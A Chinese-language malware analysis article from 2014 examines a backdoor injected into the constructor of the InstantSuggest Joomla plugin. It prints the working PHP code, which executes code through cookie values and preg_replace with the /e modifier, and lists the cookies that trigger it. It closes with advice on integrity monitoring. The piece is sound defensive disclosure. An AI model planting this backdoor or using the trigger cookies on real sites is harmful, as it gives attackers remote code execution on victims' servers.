移动安全 安全管理 应用案例 网络威胁系统安全 应用安全 数据安全 云安全
当前位置: 主页 > 信息安全 > 系统安全 >

Joomla插件构造函数后门分析

时间:2014-05-12 17:37来源:TuZhiJiaMi企业信息安全专家 点击:
本文介绍我们在Joomla插件中发现的一个有趣的后门。 尽管感觉有点不太对劲,不过由于代码组织良好,最开始我们没有意识到里面包含后门。插件的代码如下所示: 乍一看没什么特别的,没有
Tags系统安全(735)后门(33)Joomla插件(1)  

  本文介绍我们在Joomla插件中发现的一个有趣的后门。

Joomla插件构造函数后门分析

  尽管感觉有点不太对劲,不过由于代码组织良好,最开始我们没有意识到里面包含后门。插件的代码如下所示:

Joomla插件构造函数后门分析

  乍一看没什么特别的,没有代码加密,没有代码混淆,也没什么注释,就是正常的Joomla插件代码。

  但是如果仔细研究就会发现,类的构造函数不太正常:

  public function __construct() {

  $filter = JRequest::getString('p3', Null, 'cookie');

  if ($filter) {

  $option = $filter(JRequest::getString('p2', Null, 'cookie'));

  $auth = $filter(JRequest::getString('p1', Null, 'cookie'));

  $option("/123/e",$auth,123);

  die();

  }

  }

  第一个真正可疑的是代码结尾处的die();,该函数会终止脚本的执行,放在Joomla插件中,表示该函数会终止Joomla的执行。插件不应该这么做,特别是在初始化阶段。

  另外,读者可能已经注意到了字符串“/123/e”,类似于许多基于preg_replace的后门中“eval”标记的正则表达式匹配模式。这么一看就会发现,如果用preg_replace替换掉$option,恰好得到一句经典的gre_replace后门代码:

  preg_replace("/123/e", $auth, 123);

  123总是与123匹配,所以这段代码总是会取得$auth变量的值,不管这个值是什么。

  为了使该假设变成真,$option应该等价于“preg_replace”,$auth应该包含PHP功能代码。那么这种想法是否可行呢?我们可以看到这两个变量都是用cookie值填充的,所以,是的,这种想法是可行的。

  通过分析代码可以看到该后门以如下方式运行:

  1,Joomla中启用该插件后,会在每个页面加载,因此插件的类的构造函数总能得到执行。

  2,攻击者可以通过设置以下cookie请求网站的任意页面:

  p3 - 该变量触发后门执行,如果没有该变量,Joomla会正常执行。

  p2 - 该变量的值应该设置为“preg_replace”、

  p1 - 任意PHP功能代码

  整个插件都是恶意代码吗

  我之前的文章中提到,恶意代码被植入到Wordpress插件后被重新打包成盗版商业插件,但与此不同的是,本文提到的Joomla插件看起来不像是站长从某个小网站弄来的,该插件名为InstantSuggest,是一款免费插件,并不怎么流行(下载量小于400)。其官方代码中不包含__construct()函数。

  可以看到源码中的漏洞已经补上了,因此最有可能的情况是黑客黑进该站点后添加了这个后门。事实上我们也是在一个被黑网站上发现这个后门的(这个没什么可惊喜的,我们的大部分工作都是与被黑站点打交道)。

  另外,黑客不是仅仅将后门注入到某个插件中,而是安装到某个已经打过补丁的插件里,这样看起不可疑,也不会破坏任何东西。这比修改网站中现有的文件要容易一些,因为修改网站现有文件时有时候可能会会破坏网站,因此需要更复杂的injector。

  为证明这一假设,我们搜索了网络中包含该后门代码的网站,发现几乎全都包含在instantsuggest代码中——我不相信所有这些网站都是主动安装了这个不知名的插件。另外,这段恶意代码也被用在了Joomla上下文之外,将Joomla API请求替换为简单的@$_COOKIE调用(可参考cPanel论坛)。即使在这些案例中,其仍然被包含在instantsuggest代码中——这么做只是为了使后门看起来不那么可疑。

  To 站长:

  如读者所见,黑客可以可很容易将后门隐藏在我们的眼皮底下,当人工审查代码时很难将其辨识出来,特别是像Joomla这种包含上千个文件的系统,安全扫描器也可能无法识别这种不常见的后门。检测这种后门唯一可靠的方法就是完整性控制,当检测到文件被修改时提供向站长提供警报,使站长可以立即解决可能产生的问题。许多版本控制系统可以完成这种工作 ,如果读者启用我们的Sucuri监控服务中的服务端扫描,也可以发现服务中的完整性控制功能。

  还需要说明的是,通过cookie向后门中传递恶意代码已经成为趋势,利用这种方式,黑客可以使用常规GET请求,这样就不会在web服务日志分析系统中产生任何可疑操作。要检测并阻止这种请求,站长需要一款更高级的website防火墙解决方案。

------分隔线----------------------------

推荐内容